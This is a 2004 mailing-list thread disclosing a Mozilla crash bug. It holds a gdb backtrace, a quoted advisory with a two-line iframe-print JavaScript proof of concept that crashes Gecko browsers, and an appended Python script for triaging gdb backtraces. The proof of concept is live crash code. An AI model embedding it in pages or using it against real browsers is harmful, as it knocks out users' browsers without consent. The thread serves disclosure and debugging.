Message-ID: <41B4B62C.1020706@secnetops.com>
Date: Mon, 06 Dec 2004 14:42:36 -0500
From: Kevin Finisterre <kf_lists@...netops.com>
To: Niek van der Maas <niekvdmaas@...il.com>
Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Re: [Advisory] Mozilla Products Remote Crash Vulnerability


(gdb) c
Continuing.
[New Thread 147461 (LWP 10836)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 10810)]
0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
(gdb) bt
#0  0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
#1  0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#2  0x412cb905 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#3  0x412d28a5 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#4  0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#5  0x40069215 in js_Interpret () from /usr/lib/libmozjs.so
#6  0x400604ac in js_Execute () from /usr/lib/libmozjs.so
#7  0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from 
/usr/lib/libmozjs.so
#8  0x411068c8 in nsJSContext::EvaluateString () from 
/usr/lib/mozilla/components/libgklayout.so
#9  0x40fa0020 in nsScriptLoader::EvaluateScript () from 
/usr/lib/mozilla/components/libgklayout.so
#10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from 
/usr/lib/mozilla/components/libgklayout.so
#11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from 
/usr/lib/mozilla/components/libgklayout.so
#12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from 
/usr/lib/mozilla/components/libgklayout.so
#13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from 
/usr/lib/mozilla/components/libgklayout.so
#14 0x40f5ac89 in nsGenericElement::AppendChildTo () from 
/usr/lib/mozilla/components/libgklayout.so
#15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from 
/usr/lib/mozilla/components/libgklayout.so
#16 0x410431d0 in HTMLContentSink::Init () from 
/usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
#19 0x08d9bd30 in ?? ()
#20 0xbffff1a8 in ?? ()
#21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#22 0x08c8e9b8 in ?? ()
#23 0x00000000 in ?? ()
#24 0xbffff1a8 in ?? ()
#25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#26 0x08c8e9b8 in ?? ()
#27 0x08d9bd30 in ?? ()
#28 0xbffff1d8 in ?? ()
#29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#30 0x00000054 in ?? ()
#31 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#32 0xbffff1d8 in ?? ()
#33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#34 0x08c8e9b8 in ?? ()
#35 0x08d9bd30 in ?? ()
#36 0xbffff1d8 in ?? ()
#37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#38 0x08162600 in ?? ()
#39 0x00000000 in ?? ()
#40 0x08c8e9b8 in ?? ()
#41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#42 0x00000001 in ?? ()
#43 0x00000001 in ?? ()
#44 0xbffff228 in ?? ()
#45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#46 0x08c8e9b8 in ?? ()
#47 0x08d9bd30 in ?? ()
#48 0x00000054 in ?? ()
#49 0x00000001 in ?? ()
#50 0x00000000 in ?? ()
#51 0x08d9bd30 in ?? ()
#52 0x08c8e9b8 in ?? ()
#53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#54 0xbffff218 in ?? ()
#55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#56 0x00000001 in ?? ()
#57 0x00000001 in ?? ()
#58 0x00000001 in ?? ()
#59 0x08c8e9b8 in ?? ()
#60 0x00000001 in ?? ()
#61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#62 0x00000000 in ?? ()
#63 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#64 0xbffff268 in ?? ()
#65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#66 0x08c8e9b8 in ?? ()
#67 0x08972690 in ?? ()
#68 0x00000054 in ?? ()
#69 0x08d9bd30 in ?? ()
#70 0x08972800 in ?? ()
#71 0x00000000 in ?? ()
#72 0x0000000f in ?? ()
#73 0x00000054 in ?? ()
#74 0x08d9bd30 in ?? ()
#75 0x08c8e9b8 in ?? ()
#76 0x00000001 in ?? ()
#77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#78 0x00000000 in ?? ()
#79 0x08972690 in ?? ()
#80 0xbffff348 in ?? ()
#81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#82 0x08c8e9b8 in ?? ()
#83 0x08972690 in ?? ()
#84 0x00000028 in ?? ()
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)

-KF


Niek van der Maas wrote:
> Hi,
> 
> I'm posting it here, the Mozilla guys didn't want to answer or even
> confirm this bug. No idea whether this one is exploitable or not, I'll
> leave that over to the readers of these lists.
> Bye,
> 
> Niek van der Maas
> MaasOnline
> http://maas-online.nl/
> 
> 
> Mozilla Products Remote Crash Vulnerability
> ===========================================
> 
> Vendor        : The Mozilla Organisation
> Product(s)    : Navigator, Firefox, other Gecko based products
> Version(s)    : All released versions
> Platform(s)   : All platforms (confirmed on Windows, Linux and SunOS)
> Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/)
> Advisory URL  : http://maas-online.nl/security/advisory-mozilla-crash.txt
> 
> 
> DESCRIPTION
>   While working on one of my projects I discovered a vulnerability in Firefox,
>   allowing an attacker to crash the browser. Further investigation showed that
>   this vulnerability also applies to other Mozilla products, like Navigator.
>   All platforms and versions are affected.
>   The crash occurs when a one-line JavaScript is executed which tries to print
>   an iframe. The crash does not occur when executing this JavaScript in the
>   'onload' tag or after clicking a link (i.e., 'onclick').
> 
> 
> PROOF OF CONCEPT
>   The vulnerability can be exploited with the following 2 lines of code:
>     <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
>     <script type="text/javascript">window.frames.pocframe.print();</script>
>   A sample page containing these 2 lines is available at
>     http://maas-online.nl/security/poc-mozilla-crash.html
> 
> 
> PATCH / WORKAROUND
>   No patch is available at this time. The only solution is to disable JavaScript
>   execution entirely.
> 
> 
> VENDOR RESPONSE
>   The bug (#272381) was opened 2004-11-30 in Bugzilla.
>   Until now (2004-12-06), no response or confirmation has been received. Contacting
>   the Mozilla Security Team on IRC didn't help either; it seems that they're
>   simply not interested.
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
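Reading the backtrace above: frames #0-#16 are fully symbolised and form a coherent path (the HTML content sink processes the SCRIPT tag during parsing, nsScriptLoader hands the source to SpiderMonkey, js_Invoke goes through XPConnect into GlobalWindowImpl::MakeScriptDialogTitle, where the SIGSEGV lands). That the call happens from inside the parser is consistent with the advisory's observation that the inline script triggers the crash while 'onload' and 'onclick' do not. The "frames" from #18 on alternate between addresses inside libhtmlpars.so, for which gdb has no symbols, and values that cannot be return addresses at all (0x00000000, 0x00000001, 0x00000054, stack addresses such as 0xbffff1a8), and the noise begins exactly where the unwinder enters that unsymbolised module. That is the pattern gdb produces when it walks frames it cannot unwind, so the closing "corrupt stack?" is not by itself evidence of a smashed stack, and it does not settle the exploitability question Niek leaves open; the first 17 frames are the part worth reading. The script below, added here as an example and not code from either poster, automates that reading: it parses gdb 'bt' output (rejoining gdb's wrapped "from" lines and dropping its pager prompts), finds where symbolisation stops, flags return-address slots holding stack or null-page values, and reports whether the garbage starts only after the first unsymbolised module. The embedded sample is an excerpt of the backtrace above with most frames elided; the address ranges used to classify values assume a classic i386 Linux layout (user stack just below 0xc0000000, first page unmapped) and are marked as assumptions in the code.

```python
"""Triage a pasted gdb backtrace: where does symbolisation stop, which
"return addresses" cannot be code at all, and is 'corrupt stack?' evidence
of memory corruption or only of the unwinder losing its way?"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Excerpt (most frames elided) of the gdb session posted above in this thread.
SAMPLE_BT = """\
0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from
/usr/lib/mozilla/components/libgklayout.so
(gdb) bt
#0  0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from
/usr/lib/mozilla/components/libgklayout.so
#1  0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#4  0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#16 0x410431d0 in HTMLContentSink::Init () from
/usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
#20 0xbffff1a8 in ?? ()
#23 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#32 0xbffff1d8 in ?? ()
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)
"""

# Assumption: classic i386 Linux layout, main-thread stack just below
# 0xc0000000 and the first page unmapped. Adjust for other targets.
STACK_RANGE = (0xBF000000, 0xC0000000)
NULL_PAGE_LIMIT = 0x1000

# '#N  0xADDR in FUNC () [from LIB]' as printed by gdb's bt command.
FRAME_RE = re.compile(
    r"^#(?P<n>\d+)\s+0x(?P<addr>[0-9a-fA-F]+)\s+in\s+(?P<func>\S.*?)\s*\(\)"
    r"(?:\s+from\s+(?P<lib>\S+))?$"
)


@dataclass
class Frame:
    index: int
    addr: int
    func: str          # "??" when gdb had no symbol for the address
    lib: Optional[str]


def _rejoin(text: str) -> List[str]:
    """Undo gdb's wrapping of '... from' / '/path/lib.so' and drop pager prompts."""
    out: List[str] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("---Type <return>"):
            continue
        if out and out[-1].endswith(" from"):
            out[-1] = f"{out[-1]} {line.strip()}"
        else:
            out.append(line)
    return out


def parse_backtrace(text: str) -> List[Frame]:
    """Return the numbered frames of a gdb 'bt' dump, in order."""
    frames: List[Frame] = []
    for line in _rejoin(text):
        m = FRAME_RE.match(line)
        if m:
            frames.append(Frame(int(m["n"]), int(m["addr"], 16), m["func"], m["lib"]))
    return frames


def triage(text: str) -> dict:
    frames = parse_backtrace(text)
    first_bad = next((f.index for f in frames if f.func == "??"), None)
    trusted = [f for f in frames if first_bad is None or f.index < first_bad]
    return {
        "crash_site": f"{frames[0].func} in {frames[0].lib}" if frames else None,
        "frames": len(frames),
        "trusted_frames": len(trusted),
        "first_unsymbolised": first_bad,
        # A return-address slot holding a stack pointer or a null-page value
        # is not a frame: gdb is walking data, not code.
        "stack_as_pc": [f.index for f in frames if STACK_RANGE[0] <= f.addr < STACK_RANGE[1]],
        "null_page_as_pc": [f.index for f in frames if f.addr < NULL_PAGE_LIMIT],
        "modules": Counter((f.lib or "?").rsplit("/", 1)[-1] for f in frames),
        "unwinder_gave_up": "corrupt stack?" in text,
    }


def verdict(report: dict) -> str:
    """Garbage only after the first unsymbolised frame: gdb lost the chain in a
    module without symbols. Garbage among symbolised frames: the saved return
    addresses themselves look overwritten."""
    garbage = sorted(report["stack_as_pc"] + report["null_page_as_pc"])
    first_bad = report["first_unsymbolised"]
    if not garbage:
        return "clean"
    if first_bad is not None and garbage[0] > first_bad:
        return f"unwinder lost track at frame #{first_bad}; frames before it are usable"
    return "garbage return addresses among symbolised frames: suspect stack corruption"
```

Run `verdict(triage(open("bt.txt").read()))` on a saved gdb session; on the excerpt above it reports that the unwinder lost track at frame #17, which is where libhtmlpars.so appears without symbols.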

